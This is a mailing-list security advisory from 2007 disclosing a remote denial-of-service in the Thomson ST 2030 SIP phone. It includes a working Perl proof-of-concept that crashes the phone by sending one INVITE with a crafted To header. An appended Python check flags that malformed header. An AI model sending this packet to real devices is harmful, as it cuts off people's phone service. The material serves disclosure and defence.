Subject: [Full-disclosure] DOS vulnerability on Thomson SIP phone ST 2030 using the TO Header
Date: Mon, 27 Aug 2007 12:11:41 +0200
MADYNES Security Advisory: Remote DoS on Thomson SIP phone ST 2030

Date of Discovery: 15 February 2007

Vendor was notified on 1 March 2007

ID: KIPH9

Synopsis

Once a message with a crafted To URI field is sent, the device looks
functional but in fact no longer responds to any event, which amounts to a DoS.

Background

SIP is the IETF-standardized protocol (RFCs 2543 and 3261) for VoIP
signalling. SIP is ASCII based; its INVITE message is used to initiate and
maintain a communication session.

Affected devices: Thomson SIP phone ST 2030

Impact:

A malicious user can remotely crash the device and perform a denial of service
attack by sending a single crafted SIP message.

Resolution

Fixed software will be available from the vendor, and customers following
recommended best practices (i.e. segregating VoIP traffic from data) will be
protected from malicious traffic in most situations.

Credits

Humberto J. Abdelnur (Ph.D. student)

Radu State (Ph.D.)

Olivier Festor (Ph.D.)

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see
http://hal.inria.fr/inria-00166947/en).

Configuration of our device:

Software Version: v1.52.1

IP address obtained by DHCP: 192.168.1.106

User name: thomson

To run the exploit, the file thomson-2030-2.pl should be launched (assuming
our configuration) as:

 perl thomson-2030-2.pl 192.168.1.106 5060 thomson

POC Code:

#!/usr/bin/perl
# Vulnerability for Thomson 2030 firmware v1.52.1
# It provokes a DoS in the device.
use strict;
use warnings;
use IO::Socket::INET;

die "Usage: $0 <dst> <port> <username>\n" unless defined $ARGV[2];

my ($dst, $port, $user) = @ARGV;

# UDP socket towards the phone's SIP port
my $socket = IO::Socket::INET->new(PeerAddr => $dst,
                                   PeerPort => $port,
                                   Proto    => 'udp')
    or die "Cannot create socket: $!\n";

# A single INVITE whose To header carries the crafted, non-URI value
my $msg = "INVITE sip:$user\@$dst SIP/2.0\r\n"
        . "Via: SIP/2.0/UDP 192.168.1.2;branch=00\r\n"
        . "From: <sip:tucu\@192.168.1.2>;tag=00\r\n"
        . "To: <A15+-97:=:%0B>;tag=00\r\n"
        . "Call-ID: humbol\@192.168.1.2\r\n"
        . "CSeq: 1 INVITE\r\n"
        . "\r\n";

$socket->send($msg) or die "send failed: $!\n";
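As an added defensive example (not part of the advisory and not the KIPH fuzzer), the following Python check parses the To header of a SIP request and flags a To URI that is not a valid sip/sips address or that carries percent-encoded control characters, using the INVITE from this advisory as constructed sample input; the URI grammar below is a deliberately simplified subset of RFC 3261, written for this example.

```python
import re
# Accepts only sip:/sips: URIs with a plausible [user@]host[:port][;params]; the
# advisory's To value is not a URI at all and also carries an encoded control char.
ADDR_SPEC = re.compile(
    r"^sips?:(?:[A-Za-z0-9._~!$&'()*+,;=%-]+@)?"           # optional user@
    r"(?:[A-Za-z0-9.-]+|\[[0-9A-Fa-f:.]+\])(?::\d{1,5})?"  # host[:port]
    r"(?:;[A-Za-z0-9._~!$&'()*+,=%-]+)*$"                  # uri-parameters
)
# Percent-encoded C0 controls (%00-%1F) and DEL (%7F) have no place in a SIP URI
ENCODED_CTRL = re.compile(r"%[01][0-9A-Fa-f]|%7[Ff]")

def parse_headers(raw):
    """Split a SIP request into (request_line, {lowercase name: value});
    compact forms 't'/'f' are expanded to 'to'/'from' (RFC 3261 7.3.3)."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name = name.strip().lower()
        headers[{"t": "to", "f": "from"}.get(name, name)] = value.strip()
    return lines[0], headers

def check_to_header(raw):
    """Return a list of findings for the To header; [] means it looks sane."""
    _, headers = parse_headers(raw)
    to = headers.get("to")
    if to is None:
        return ["missing To header"]
    # name-addr form: take what sits between < and >; else drop ;tag=... params
    m = re.match(r"^[^<]*<([^>]*)>", to)
    uri = m.group(1) if m else to.split(";", 1)[0]
    findings = []
    if ENCODED_CTRL.search(uri):
        findings.append("percent-encoded control character in To URI")
    if not ADDR_SPEC.match(uri):
        findings.append(f"To URI is not a valid sip/sips addr-spec: {uri!r}")
    return findings

# Constructed sample input: the INVITE from this advisory, and a well-formed
# variant that differs only in its To header.
CRAFTED_INVITE = (
    "INVITE sip:thomson@192.168.1.106 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.1.2;branch=00\r\n"
    "From: <sip:tucu@192.168.1.2>;tag=00\r\n"
    "To: <A15+-97:=:%0B>;tag=00\r\n"
    "Call-ID: humbol@192.168.1.2\r\nCSeq: 1 INVITE\r\n\r\n"
)
BENIGN_INVITE = CRAFTED_INVITE.replace("<A15+-97:=:%0B>", "<sip:thomson@192.168.1.106>")
```

check_to_header(CRAFTED_INVITE) returns two findings (encoded control character, invalid addr-spec) while check_to_header(BENIGN_INVITE) returns []; a SIP proxy or IDS rule applying the same check in front of the phone would drop the message before it reaches the device.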
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/